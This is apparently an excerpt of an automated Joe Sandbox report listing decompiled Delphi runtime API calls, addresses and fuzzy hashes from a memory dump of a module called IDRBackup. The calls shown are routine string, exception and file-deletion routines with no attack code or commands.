                                                                                                    • Part of subcall function 5002D4E0: @System@@DynArrayLength$qqrv.RTL120(?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4E8
                                                                                                    • Part of subcall function 5002D4E0: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(00000000,?,?,5002D743,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D4F4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                    • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                    • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                    • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                    • Part of subcall function 5002D778: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                    • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Sysutils@$Exception@$bctr$qqrp20String$ArrayExcept$qqrvRaise$DynamicLength$qqrvSystem@%$Encoding@Recpx14Recxi$ByteCount$qqrx24$Array$tb%ii$Array$tb%Array$tb%iir25Array$tuc%iBytes$qqrx24Length$qqrrpvpvipi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2407772116-0
                                                                                                  • Opcode ID: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                  • Instruction ID: 9aaef7661f88e341657fce88e442fcf8159dd86dd4df8b5ba2cc1c183d9f0c43
                                                                                                  • Opcode Fuzzy Hash: 1dc450ecc9b7c26e56a1978d27bd101473ac7bfdd39d81aed57d41dd007fa2c2
                                                                                                  • Instruction Fuzzy Hash: BAE04F6170615427E21462AEBC42E3BA6CEC7D8A21F50413BBA09C7352DCA5EC0242E4
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C22A
                                                                                                  • @System@TObject@$bctr$qqrv.RTL120(?,?,?,5002C1FA), ref: 5002C239
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,?,5002C1FA), ref: 5002C249
                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,5002C1FA), ref: 5002C259
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$AfterBuilder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvStringSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1727176548-0
                                                                                                  • Opcode ID: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                  • Instruction ID: f4a9a15b8d1a87e593a23b1651af1a404b07da154b15add0f3e5161749c54f5b
                                                                                                  • Opcode Fuzzy Hash: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                  • Instruction Fuzzy Hash: E9E022B3B02481878300C6AE7C41A6676C78FC5570B188332B028CB385EB268C1603E2
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50014342,?,00000000), ref: 50014313
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50014342,?,00000000), ref: 50014322
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50014342,?,00000000), ref: 50014327
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 98ccc1d5f2630f6518c2775a4f6d229749f85d97b1d2f6e253096087c6293393
                                                                                                  • Instruction ID: ccdb1991516171cd19e0ef9f1dd462ec752cf41ca7ab63605b4c294a36c3ea3a
                                                                                                  • Opcode Fuzzy Hash: 98ccc1d5f2630f6518c2775a4f6d229749f85d97b1d2f6e253096087c6293393
                                                                                                  • Instruction Fuzzy Hash: 46E092341156C8EFE711DBA4ED62869B3B8EF94700F914563F90083661DA316F04D990
                                                                                                  APIs
                                                                                                  • @Sysutils@TStringBuilder@get_Capacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C366
                                                                                                    • Part of subcall function 5002C39C: @System@@DynArrayLength$qqrv.RTL120(5002CEC3), ref: 5002C39F
                                                                                                  • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C37C
                                                                                                  • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C387
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,5002CECE), ref: 5002C392
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSysutils@$Builder@get_Capacity$qqrv$ArrayBuilder@set_Capacity$qqriLength$qqrvSystem@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1916226493-0
                                                                                                  • Opcode ID: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                  • Instruction ID: 23260aa18dfd21666b53627013c0cc0a4d10d4ba6927f08ef2018b0f3389f9ba
                                                                                                  • Opcode Fuzzy Hash: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                  • Instruction Fuzzy Hash: 2EE0E223B135B2078720E9BCBCC188D41C84A280B030AAF77F805EB303E5A9CE8543C0
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030756,?,00000000), ref: 50030727
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030756,?,00000000), ref: 50030736
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030756,?,00000000), ref: 5003073B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                  • Instruction ID: 7b96b98e3e44b9784b1c23c869ab84a684675366666c903ca15437983a838fae
                                                                                                  • Opcode Fuzzy Hash: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                  • Instruction Fuzzy Hash: 12E09234505588EFEB22DB90FD629AAB3A9EB59700FE10573F90083651DA317E00D9A0
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                  • Instruction ID: 0fd73ecdc63e3906adab3347c8ca8083b58c1d45574116356cda35ff769876bc
                                                                                                  • Opcode Fuzzy Hash: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                  • Instruction Fuzzy Hash: D5E09234105688EFEB11DFA1EE6296AB3A9EB94740FA10573F90482651DE316E00D990
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5003089A,?,00000000), ref: 5003086B
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5003089A,?,00000000), ref: 5003087A
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5003089A,?,00000000), ref: 5003087F
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                  • Instruction ID: 375d69ef3d01049e605aa9f8fdfeda863f1c380b39b0ffaf094c9cd922885603
                                                                                                  • Opcode Fuzzy Hash: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                  • Instruction Fuzzy Hash: A7E09B34105684DFFB12DB94ED7399A73A8EB54700F9105B3F90142651DE356E00D990
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030A7E,?,00000000), ref: 50030A4F
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030A7E,?,00000000), ref: 50030A5E
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030A7E,?,00000000), ref: 50030A63
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                  • Instruction ID: 7528d12fff5074f310ed779a2ab25226a40bb15e629f8c4203f1ec9f173bc9b7
                                                                                                  • Opcode Fuzzy Hash: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                  • Instruction Fuzzy Hash: BDE0D834105A88EFEB12DBE0FD729AAB7B9EB59700F914577F90083651DF316E00D991
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030DEA,?,00000000), ref: 50030DBB
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030DEA,?,00000000), ref: 50030DCA
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030DEA,?,00000000), ref: 50030DCF
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,50003885), ref: 50002142
                                                                                                  • Sleep.KERNEL32(0000000A,00000000,50003885), ref: 5000215B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: LJP$LJP
                                                                                                  • API String ID: 3472027048-3339104776
                                                                                                  APIs
                                                                                                  • @System@SetInOutRes$qqri.RTL120 ref: 5000513C
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 50005147
                                                                                                  • GetLastError.KERNEL32(?), ref: 50005150
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?), ref: 50005155
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Res$qqriSystem@$DeleteErrorFileLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2381681663-0
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003A6A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillSystem@@
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 4121559260-1976356052
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 5000384A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillSystem@@
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 4121559260-1976356052
                                                                                                  APIs
                                                                                                  • @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Power10$qqrvSystem@
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 140778524-2137968064
                                                                                                  APIs
                                                                                                  • @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Power10$qqrvSystem@
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 140778524-2137968064
                                                                                                  APIs
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000467A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Length$qqrr20StringiSystem@System@@Unicode
                                                                                                  • String ID: $"
                                                                                                  • API String ID: 1238308113-3817095088
                                                                                                  • Opcode ID: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                  • Instruction ID: a4110a0b3ab76dcf93db08b7b91ce8b4ca9335338cd7ea686d5f75d583f17b04
